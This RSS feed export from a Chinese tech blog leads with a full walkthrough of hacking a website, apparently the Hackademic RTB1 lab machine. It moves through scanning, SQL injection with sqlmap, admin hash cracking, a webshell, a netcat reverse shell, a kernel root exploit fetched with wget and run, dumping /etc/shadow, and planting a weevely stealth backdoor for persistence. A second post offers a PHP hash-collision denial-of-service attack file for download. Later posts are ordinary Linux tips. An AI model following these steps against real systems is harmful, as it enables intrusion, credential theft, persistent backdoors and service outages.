<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>逐渐老去的IT菜鸟</title>
	<atom:link href="http://www.willsonchen.com/feed" rel="self" type="application/rss+xml" />
	<link>http://www.willsonchen.com</link>
	<description>千里之行，始于足下，做好自己。</description>
	<lastBuildDate>Sat, 10 Mar 2012 09:28:28 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>黑客是怎么攻击一个网站的？</title>
		<link>http://www.willsonchen.com/archives/386</link>
		<comments>http://www.willsonchen.com/archives/386#comments</comments>
		<pubDate>Sat, 10 Mar 2012 09:24:55 +0000</pubDate>
		<dc:creator>willson</dc:creator>
				<category><![CDATA[网站安全]]></category>
		<category><![CDATA[黑客]]></category>
		<category><![CDATA[攻击]]></category>

		<guid isPermaLink="false">http://www.willsonchen.com/?p=386</guid>
		<description><![CDATA[问题的答案看起来不那么确定，显而易见的是黑掉一个站点有很多种方法。在这篇文章，我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的！ 让我们来看看目标站点：hack-te... ]]></description>
			<content:encoded><![CDATA[<p>问题的答案看起来不那么确定，显而易见的是黑掉一个站点有很多种方法。在这篇文章，我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的！</p>
<p>让我们来看看目标站点：hack-test.com</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_041.jpg" alt="hack" width="492" height="263" /></p>
<p>先ping下站点所在服务器的IP：</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_040.jpg" alt="hack" width="464" height="145" /></p>
<p>现在我们有了目标站点所在服务器的IP了 — 173.236.138.113</p>
<p>然后我们可以找找同个IP上的其他站点（旁站：sameip.org）：</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_039.jpg" alt="hack" width="521" height="276" /></p>
<p>Same IP   26 sites hosted on IP Address 173.236.138.113</p>
<table border="0">
<tbody valign="top">
<tr>
<td valign="middle"><strong>ID</strong></td>
<td valign="middle"><strong>Domain</strong></td>
<td valign="middle"><strong>Site Link</strong></td>
</tr>
<tr>
<td valign="middle">1</td>
<td valign="middle">hijackthisforum.com</td>
<td valign="middle">hijackthisforum.com</td>
</tr>
<tr>
<td valign="middle">2</td>
<td valign="middle">sportforum.net</td>
<td valign="middle">sportforum.net</td>
</tr>
<tr>
<td valign="middle">3</td>
<td valign="middle">freeonlinesudoku.net</td>
<td valign="middle">freeonlinesudoku.net</td>
</tr>
<tr>
<td valign="middle">4</td>
<td valign="middle">cosplayhell.com</td>
<td valign="middle">cosplayhell.com</td>
</tr>
<tr>
<td valign="middle">5</td>
<td valign="middle">videogamenews.org</td>
<td valign="middle">videogamenews.org</td>
</tr>
<tr>
<td valign="middle">6</td>
<td valign="middle">gametour.com</td>
<td valign="middle">gametour.com</td>
</tr>
<tr>
<td valign="middle">7</td>
<td valign="middle">qualitypetsitting.net</td>
<td valign="middle">qualitypetsitting.net</td>
</tr>
<tr>
<td valign="middle">8</td>
<td valign="middle">brendanichols.com</td>
<td valign="middle">brendanichols.com</td>
</tr>
<tr>
<td valign="middle">9</td>
<td valign="middle">8ez.com</td>
<td valign="middle">8ez.com</td>
</tr>
<tr>
<td valign="middle">10</td>
<td valign="middle">hack-test.com</td>
<td valign="middle">hack-test.com</td>
</tr>
<tr>
<td valign="middle">11</td>
<td valign="middle">kisax.com</td>
<td valign="middle">kisax.com</td>
</tr>
<tr>
<td valign="middle">12</td>
<td valign="middle">paisans.com</td>
<td valign="middle">paisans.com</td>
</tr>
<tr>
<td valign="middle">13</td>
<td valign="middle">mghz.com</td>
<td valign="middle">mghz.com</td>
</tr>
<tr>
<td valign="middle">14</td>
<td valign="middle">debateful.com</td>
<td valign="middle">debateful.com</td>
</tr>
<tr>
<td valign="middle">15</td>
<td valign="middle">jazzygoodtimes.com</td>
<td valign="middle">jazzygoodtimes.com</td>
</tr>
<tr>
<td valign="middle">16</td>
<td valign="middle">fruny.com</td>
<td valign="middle">fruny.com</td>
</tr>
<tr>
<td valign="middle">17</td>
<td valign="middle">vbum.com</td>
<td valign="middle">vbum.com</td>
</tr>
<tr>
<td valign="middle">18</td>
<td valign="middle">wuckie.com</td>
<td valign="middle">wuckie.com</td>
</tr>
<tr>
<td valign="middle">19</td>
<td valign="middle">force5inc.com</td>
<td valign="middle">force5inc.com</td>
</tr>
<tr>
<td valign="middle">20</td>
<td valign="middle">virushero.com</td>
<td valign="middle">virushero.com</td>
</tr>
<tr>
<td valign="middle">21</td>
<td valign="middle">twincitiesbusinesspeernetwork.com</td>
<td valign="middle">twincitiesbusinesspeernetwork.com</td>
</tr>
<tr>
<td valign="middle">22</td>
<td valign="middle">jennieko.com</td>
<td valign="middle">jennieko.com</td>
</tr>
<tr>
<td valign="middle">23</td>
<td valign="middle">davereedy.com</td>
<td valign="middle">davereedy.com</td>
</tr>
<tr>
<td valign="middle">24</td>
<td valign="middle">joygarrido.com</td>
<td valign="middle">joygarrido.com</td>
</tr>
<tr>
<td valign="middle">25</td>
<td valign="middle">prismapp.com</td>
<td valign="middle">prismapp.com</td>
</tr>
<tr>
<td valign="middle">26</td>
<td valign="middle">utiligolf.com</td>
<td valign="middle">utiligolf.com</td>
</tr>
</tbody>
</table>
<p>总计有26个站点在[173.236.138.113]这台服务器上。为了黑掉目标站点，许多黑客会把目标站点同服的其他站点也划入攻击范围内。但是出于学习的目的，我们今天暂且将其他站点放在一边。</p>
<p>我们需要更多关于目标站点的信息（Ps：笔者认为在渗透测试过程中，这比实施测试的环节来得重要得多。），他们包括：</p>
<p>1.DNS记录（A，NS，TXT，MX）</p>
<p>2.WEB服务类型（IIS，APACHE，TOMCAT）</p>
<p>3.域名注册者的信息（所持有域名公司等）</p>
<p>4.目标站点管理员（相关人员）的姓名，电话，邮箱和住址等</p>
<p>5.目标站点所支持的脚本类型（PHP，ASP，JSP，ASP.net，CFM）</p>
<p>6.目标站点的操作系统（UNIX,LINUX,WINDOWS,SOLARIS）</p>
<p>7.目标站点开放的端口</p>
<p>让我们先来查询相关DNS记录吧，这里用的是 who.is：</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_038.jpg" alt="hack" width="576" height="306" /></p>
<p>目标站点DNS记录信息：</p>
<table border="0">
<tbody valign="top">
<tr>
<td valign="middle"><strong>Record</strong></td>
<td valign="middle"><strong>Type</strong></td>
<td valign="middle"><strong>TTL</strong></td>
<td valign="middle"><strong>Priority</strong></td>
<td valign="middle"><strong>Content</strong></td>
</tr>
<tr>
<td valign="middle">hack-test.com</td>
<td valign="middle">A</td>
<td valign="middle">4 hours</td>
<td valign="middle"></td>
<td valign="middle">173.236.138.113 ()</td>
</tr>
<tr>
<td valign="middle">hack-test.com</td>
<td valign="middle">SOA</td>
<td valign="middle">4 hours</td>
<td valign="middle"></td>
<td valign="middle">ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400</td>
</tr>
<tr>
<td valign="middle">hack-test.com</td>
<td valign="middle">NS</td>
<td valign="middle">4 hours</td>
<td valign="middle"></td>
<td valign="middle">ns1.dreamhost.com</td>
</tr>
<tr>
<td valign="middle">hack-test.com</td>
<td valign="middle">NS</td>
<td valign="middle">4 hours</td>
<td valign="middle"></td>
<td valign="middle">ns3.dreamhost.com</td>
</tr>
<tr>
<td valign="middle">hack-test.com</td>
<td valign="middle">NS</td>
<td valign="middle">4 hours</td>
<td valign="middle"></td>
<td valign="middle">ns2.dreamhost.com</td>
</tr>
<tr>
<td valign="middle"><a href="http://www.hack-test.com/">www.hack-test.com</a></td>
<td valign="middle">A</td>
<td valign="middle">4 hours</td>
<td valign="middle"></td>
<td valign="middle">173.236.138.113 ()</td>
</tr>
</tbody>
</table>
<p>同时确认WEB服务的类型：</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_037.jpg" alt="hack" width="576" height="170" /></p>
<p>显而易见是Apache ,稍后我们将确定其版本：</p>
<p><strong>HACK-TEST.COM SITE INFORMATION</strong></p>
<p>IP: 173.236.138.113</p>
<p>Website Status: active</p>
<p>Server Type: Apache</p>
<p>Alexa Trend/Rank:  1 Month: 3,213,968    3 Month: 2,161,753 Page Views per Visit:  1 Month: 2.0    3 Month: 3.7</p>
<p>现在是时候来查询目标站点持有人（也许可能就是管理员）信息了：</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_036.jpg" alt="hack" width="576" height="263" /></p>
<p>现在我们有了管理员的一些相关信息了，祭出Backtrack5中的神器 Whatweb 来确认操作系统和WEB服务版本信息：</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_035.jpg" alt="h" width="576" height="10" /></p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_034.jpg" alt="hack" width="576" height="11" /></p>
<p>现在我们知道，目标站点使用了用PHP编写的非常出名的开源博客系统WordPress，并且是跑在Fedora的Linux发行版上的，Apache版本是2.2.15。接下来让我们看看目标站点服务器开了哪些端口：</p>
<p>祭出神器Nmap</p>
<p>1 – 获取目标服务器开放的服务</p>
<pre>root@bt:/# nmap -sV hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds</pre>
<p>2 – 获取目标服务器操作系统</p>
<pre>root@bt:/# nmap -O hack-test.com 

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh 

80/tcp open http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop 

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds</pre>
<p>啊哦！~只开了80，而且是 Fedora Core 6 Linux内核版本为2.6.22</p>
<p>现在我们已经收集了很多关于目标站点的重要信息了。让我们扫扫他的漏洞吧。（Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF,等等.）</p>
<p>让我们先试试 Nakto.pl 来扫扫，没准能搞出点漏洞来</p>
<p>root@bt:/pentest/web/nikto# perl nikto.pl -h <a href="http://hack-test.com/">http://hack-test.com</a><br />
- Nikto v2.1.4<br />
—————————————————————————<br />
+ Target IP: 192.168.1.2 + Target Hostname: hack-test.com + Target Port: 80 + Start Time: 2011-12-29 06:50:03<br />
—————————————————————————<br />
+ Server: Apache/2.2.15 (Fedora) + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host + End Time: 2011-12-29 06:50:37 (34 seconds)<br />
—————————————————————————</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_033.jpg" alt="hack" width="576" height="198" /></p>
<p>同时试试Wa3f（Ps：哦哇谱死的开源项目，很不错的说~）</p>
<pre>root@bt:/pentest/web/w3af# ./w3af_gui 

Starting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0 

w3af - Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.</pre>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_031.jpg" alt="hack" width="490" height="135" /></p>
<p>图形界面的扫描方式，写入URL即可。</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_032.jpg" alt="hack" width="576" height="413" /></p>
<p>用以前给杂志社投稿的语气说，泡杯茶的功夫，等待扫描结束并查看结果。</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_029.jpg" alt="hack" width="576" height="417" /></p>
<p>你可以看到很多漏洞信息鸟~先试试SQL注入。</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_030.jpg" alt="hack" width="576" height="415" /></p>
<p>url – <a href="http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220">http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220</a> 然后 Exploit it!</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_028.jpg" alt="hack" width="576" height="410" /></p>
<p>发现其他漏洞测试失败，用SQLMap进行脱裤吧（猜解数据库并保存目标站点相关信息到本地）  Dump it!</p>
<p>sqlmap -u url</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_027.jpg" alt="hack" width="576" height="24" /></p>
<p>过一小会儿能见到如下信息</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_025.jpg" alt="hack" width="576" height="22" /></p>
<p>按n并回车后你可以看到</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_026.jpg" alt="hack" width="576" height="66" /></p>
<p>哦也~显错方式的注入点，而且爆出的 Mysql的版本信息</p>
<p>用sqlmap取得所有库，参数 -dbs<br />
<img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_024.jpg" alt="hack" width="576" height="17" /></p>
<p>找到三个库</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_023.jpg" alt="hack" width="293" height="71" /></p>
<p>查Wordpress的库中所有表，参数 -D wordpress -tables</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_021.jpg" alt="hack" width="196" height="217" /></p>
<p>然后是列名（这里需要你自己熟悉敏感信息存在哪个表中呢），参数 -T wp_users -columns</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_020.jpg" alt="hack" width="576" height="22" /></p>
<p>22个字段（列）</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_019.jpg" alt="hack" width="363" height="460" /></p>
<p>然后查数据，参数 -C user_login,user_pass –dump</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_018.jpg" alt="hack" width="428" height="224" /></p>
<p>然后解密管理员的hash，这里用的是 <a href="http://www.onlinehashcrack.com/free-hash-reverse.php" rel="nofollow" target="_blank">http://www.onlinehashcrack.com/free-hash-reverse.php</a></p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_017.jpg" alt="hack" width="576" height="119" /></p>
<p>明文密码是q1w2e3（和<a href="http://www.gesong.org/pwd.txt" target="_blank">csdn库的密码排行榜</a>有得一拼，哈哈~），然后登入后台拿webshell了。</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_016.jpg" alt="hack" width="576" height="164" /></p>
<p>Get in!~</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_015.jpg" alt="hack" width="576" height="263" /></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>来传个PHP的webshell吧~这里用的编辑插件拿shell的方法（见我以前写的tips，方法有很多哦~）</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_014.jpg" alt="hack" width="576" height="236" /></p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_013.jpg" alt="hack" width="576" height="268" /></p>
<p>牛b。保存就可以了。然后访问就可以看到可爱的webshell了。</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_012.jpg" alt="hack" width="576" height="295" /></p>
<p>灰阔都知道，接下来要提权了。用反弹来获取一个交互式的shell。</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_011.jpg" alt="hack" width="576" height="293" /></p>
<p>本地用nc监听（不得不说经典就是经典啊~）</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_010.jpg" alt="hack" width="376" height="37" /></p>
<p>连上之后</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_009.jpg" alt="hack" width="576" height="51" /></p>
<p>输点Linux命令试试火候</p>
<p>id uid=48(apache) gid=489(apache) groups=489(apache)</p>
<p>pwd /var/www/html/Hackademic_RTB1/wp-content/plugins</p>
<p>uname -a Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_008.jpg" alt="hack" width="576" height="153" /></p>
<p>命令作用我就不翻译了。获取了内核版本，我们可以到 exploit-db.com 来寻找相关的exp进行权限的提升。</p>
<p>老外都是用wget下载的，国内灰阔们呢?</p>
<pre>wget http://www.exploit-db.com/download/15285 -O roro.c
--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
--2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c' 

0K ...... 100% 29.7K=0.2s</pre>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_007.jpg" alt="hack" width="576" height="228" /><br />
代码我不贴了。用gcc编译exp gcc roro.c -o roro ，编译并且执行exp。</p>
<pre>./roro 

[*] Linux kernel &gt;= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Linux kernel &gt;= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...</pre>
<p>淡定，敲个id试试，你可以发现 root it!</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_005.jpg" alt="hack" width="364" height="44" /></p>
<p>现在可以查看shadow和passwd了~（我只截了部分）</p>
<p>cat /etc/shadow<br />
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::</p>
<p>我们可以使用 John the ripper 来破哈希。但是我们不会这么做，通常我们会留下一个后门（权限巩固），这样就可以随时涂掉他首页了（hv a joke.）。</p>
<p>我们用bt5中的weevely来上传一个带密码保护的PHP的webshell。</p>
<p>1 – weevely的相关选项</p>
<pre>root@bt:/pentest/backdoors/web/weevely# ./main.py - 

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/ 

Usage: main.py [options] 

Options:
-h, --help show this help message and exit
-g, --generate Generate backdoor crypted code, requires -o and -p .
-o OUTPUT, --output=OUTPUT
Output filename for generated backdoor .
-c COMMAND, --command=COMMAND
Execute a single command and exit, requires -u and -p
.
-t, --terminal Start a terminal-like session, requires -u and -p .
-C CLUSTER, --cluster=CLUSTER
Start in cluster mode reading items from the give
file, in the form 'label,url,password' where label is
optional.
-p PASSWORD, --password=PASSWORD
Password of the encrypted backdoor . 

-u URL, --url=URL Remote backdoor URL .</pre>
<p>2 – 用它来创建一个PHP的webshell</p>
<pre> root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko 

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/ 

+ Backdoor file 'hax.php' created with password 'koko'.</pre>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_004.jpg" alt="hack" width="576" height="76" /><br />
3 – 上传</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_003.jpg" alt="hack" width="576" height="337" /></p>
<p>我们现在可以用weevely连接并操控他了。</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_001.jpg" alt="hack" width="576" height="108" /></p>
<p>测试（其实就相当于一句话马差不多的..）</p>
<p><img src="http://img165.poco.cn/mypoco/myphoto/20120121/11/56554488201201211134586724689324115_000.jpg" alt="hack" width="576" height="105" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.willsonchen.com/archives/386/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP哈希碰撞攻击以及实例</title>
		<link>http://www.willsonchen.com/archives/383</link>
		<comments>http://www.willsonchen.com/archives/383#comments</comments>
		<pubDate>Sat, 10 Mar 2012 02:43:56 +0000</pubDate>
		<dc:creator>willson</dc:creator>
				<category><![CDATA[网站安全]]></category>
		<category><![CDATA[实例]]></category>
		<category><![CDATA[哈希碰撞]]></category>
		<category><![CDATA[攻击]]></category>

		<guid isPermaLink="false">http://www.willsonchen.com/?p=383</guid>
		<description><![CDATA[不但是PHP，其他大部分语言都在核心实现了哈希表，我们最经常用到的PHP数据，$_GET，$_POST，$_COOKIE这些熟悉的全局变量就是以哈希表的形式存在。哈希表的查找效率非常高，和表的大小没有关... ]]></description>
			<content:encoded><![CDATA[<p>不但是PHP，其他大部分语言都在核心实现了哈希表，我们最经常用到的PHP数据，$_GET，$_POST，$_COOKIE这些熟悉的全局变量就是以哈希表的形式存在。哈希表的查找效率非常高，和表的大小没有关系，就是说，无论这个列表或数字有多少元素，查找的时间基本恒定。但是，哈希值是有可能重复的，也即是不同的数据项会有相同的哈希值（只是相同的机率非常非常小，在理想状态下几乎不可能），这种情况叫做哈希碰撞。</p>
<p>好了，问题来了，假设我们构建一种算法，打破这种理想的状态，使哈希表里的所有值都是相同的、碰撞的，那么就出现什么情况呢？这个时候，数据的查询和插入就不再是和表的大小没有关系了，而是线性上升，因为原本的哈希表已经退化成“单向链表”，所有的插入和查询都历遍所有的数据，查询速度会很慢，而且非常消耗CPU资源。</p>
<p>已经有牛人通过看PHP的源代码，写出如何构建PHP碰撞的例子，只不过不能直接使用这些例子，因为要POST到目标服务器，还需要一点技巧。我将其写成一个在本地运行的PHP文件，在FORM表单修改成被攻击的服务器，提交即可。</p>
<p>就一个客户端提交这样的攻击数据，在被测试的服务器中（IBM服务器，6G内存，2CPU），造成10秒的CPU 100%被占用，如下图。</p>
<div id="attachment_385" class="wp-caption aligncenter" style="width: 510px"><a href="http://www.willsonchen.com/archives/383/apache" rel="attachment wp-att-385"><img src="http://www.willsonchen.com/wp-content/uploads/2012/03/apache-500x308.png" alt="apache 100% cpu" title="apache 100% cpu" width="500" height="308" class="size-medium wp-image-385" /></a><p class="wp-caption-text">apache 100% cpu</p></div>
<p><a href='http://www.willsonchen.com/archives/383/hashattack-php-tar' rel='attachment wp-att-384'>攻击文件下载：hashattack.php.tar</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.willsonchen.com/archives/383/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>几个电商数据</title>
		<link>http://www.willsonchen.com/archives/382</link>
		<comments>http://www.willsonchen.com/archives/382#comments</comments>
		<pubDate>Fri, 09 Mar 2012 04:38:37 +0000</pubDate>
		<dc:creator>willson</dc:creator>
				<category><![CDATA[电子商务]]></category>
		<category><![CDATA[电商]]></category>
		<category><![CDATA[数据]]></category>

		<guid isPermaLink="false">http://www.willsonchen.com/?p=382</guid>
		<description><![CDATA[凡客访问量105万，转化率4.11%；一号店访问量55万，转化率5.06%；走秀访问量28万，转化率1.71%；库巴访 问量20万，转化率4.33%；苏宁易购访问量35万，转化率0.95%；当当访问量136万，转化率8.74%... ]]></description>
			<content:encoded><![CDATA[<p>凡客访问量105万，转化率4.11%；一号店访问量55万，转化率5.06%；走秀访问量28万，转化率1.71%；库巴访 问量20万，转化率4.33%；苏宁易购访问量35万，转化率0.95%；当当访问量136万，转化率8.74%。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.willsonchen.com/archives/382/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>用awk剔除两个文件中的重复行</title>
		<link>http://www.willsonchen.com/archives/378</link>
		<comments>http://www.willsonchen.com/archives/378#comments</comments>
		<pubDate>Mon, 29 Aug 2011 09:19:12 +0000</pubDate>
		<dc:creator>willson</dc:creator>
				<category><![CDATA[自由的LINUX]]></category>
		<category><![CDATA[awk]]></category>

		<guid isPermaLink="false">http://www.willsonchen.com/?p=378</guid>
		<description><![CDATA[有a、b两个文件，需要删除b文件中的所有a文件行，例如 a文件： 111 222 abc b文件： 111 ABc def 最后显示： def 使用awk如下即可： awk &#8216;NR==FNR{a[tolower($0)]}NR!=FNR&#038;&#038;!(tolower($0) in a){print $0}&#8217;... ]]></description>
			<content:encoded><![CDATA[<p>有a、b两个文件，需要删除b文件中的所有a文件行，例如<br />
a文件：<br />
111<br />
222<br />
abc</p>
<p>b文件：<br />
111<br />
ABc<br />
def</p>
<p>最后显示：<br />
def</p>
<p>使用awk如下即可：<br />
awk &#8216;NR==FNR{a[tolower($0)]}NR!=FNR&#038;&#038;!(tolower($0) in a){print $0}&#8217; a b</p>
]]></content:encoded>
			<wfw:commentRss>http://www.willsonchen.com/archives/378/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>使用shuf打乱文本顺序</title>
		<link>http://www.willsonchen.com/archives/377</link>
		<comments>http://www.willsonchen.com/archives/377#comments</comments>
		<pubDate>Mon, 29 Aug 2011 08:45:56 +0000</pubDate>
		<dc:creator>willson</dc:creator>
				<category><![CDATA[自由的LINUX]]></category>
		<category><![CDATA[shuf]]></category>

		<guid isPermaLink="false">http://www.willsonchen.com/?p=377</guid>
		<description><![CDATA[手头有100万的邮件地址，每行一个，按照字母顺序排序，现在需要将这些邮件地址全部打乱，使用linux自带的shuf命令： $shuf emailfile.txt 100万的数据瞬间完成，简单快捷。 但是很奇怪的时候，在... ]]></description>
			<content:encoded><![CDATA[<p>手头有100万的邮件地址，每行一个，按照字母顺序排序，现在需要将这些邮件地址全部打乱，使用linux自带的shuf命令：</p>
<p>$shuf emailfile.txt</p>
<p>100万的数据瞬间完成，简单快捷。</p>
<p>但是很奇怪的时候，在我的DEBIAN生产服务器上竟然找不到该命令，用aptitude search也找不到。 </p>
]]></content:encoded>
			<wfw:commentRss>http://www.willsonchen.com/archives/377/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Chrome下的截图扩展</title>
		<link>http://www.willsonchen.com/archives/375</link>
		<comments>http://www.willsonchen.com/archives/375#comments</comments>
		<pubDate>Sat, 21 May 2011 05:05:08 +0000</pubDate>
		<dc:creator>willson</dc:creator>
				<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[awescreenshot]]></category>
		<category><![CDATA[awescreenshot 截图快手]]></category>
		<category><![CDATA[chrome]]></category>
		<category><![CDATA[截图]]></category>

		<guid isPermaLink="false">http://www.willsonchen.com/?p=375</guid>
		<description><![CDATA[之前写了一篇在Ubuntu Linux下的截图软件shutter，shutter非常强大，但是对于添加自定义的文本比较麻烦，需要打开GIMP等图形编辑软件来处理。其实，可以使用浏览器的第三方扩展来截图，例如，... ]]></description>
